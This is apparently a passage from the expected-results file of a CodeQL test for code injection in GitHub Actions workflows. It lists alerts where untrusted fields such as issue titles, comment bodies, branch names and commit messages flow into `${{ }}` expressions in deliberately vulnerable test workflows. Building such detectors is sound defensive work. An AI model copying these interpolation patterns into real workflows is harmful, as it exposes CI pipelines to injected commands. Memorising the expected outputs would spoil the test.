| semmle.label | needs.test1.outputs.job_output | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | semmle.label | Uses Step: summary [value] | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | semmle.label | steps.summary.outputs.value | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | +| .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | semmle.label | github.event['head_commit']['message'] | +| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | semmle.label | Run Step: step1 [MSG] | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | semmle.label | steps.step0.outputs.value | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | semmle.label | Run Step: step2 [test] | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | semmle.label | steps.step1.outputs.MSG | +| .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | semmle.label | needs.job1.outputs['job_output'] | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | semmle.label | github.event.workflow_run.display_title | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | semmle.label | github.event.workflow_run.head_commit.message | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | semmle.label | github.event.workflow_run.head_commit.author.email | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | semmle.label | github.event.workflow_run.head_commit.author.name | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | semmle.label | github.event.workflow_run.head_commit.committer.email | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| action1/action.yml:14:19:14:50 | github.event.comment.body | semmle.label | github.event.comment.body | subpaths #select +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | ${{ env.ISSUE_BODY_PARSED }} | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | ${{env.pr_message}} | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | ${{ github.event.pages[1].title }} | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | ${{ github.event.pages[11].title }} | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | ${{ github.event.pages[0].page_name }} | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | ${{ github.event.pages[2222].page_name }} | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | ${{ github.event.review.body }} | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_review_comment.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:7:19:7:49 | github.event.issue.title | ${{ github.event.issue.title }} | +| .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:8:19:8:48 | github.event.issue.body | ${{ github.event.issue.body }} | +| .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:9:19:9:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:10:19:10:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | +| .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:11:19:11:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | +| .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:12:19:12:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | +| .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:13:19:13:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | +| .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | +| .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | +| .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | +| .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | +| .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | +| .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:10:19:10:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | +| .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:11:19:11:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | +| .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:12:19:12:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | +| .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | +| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | +| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | +| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | +| .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | +| .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | 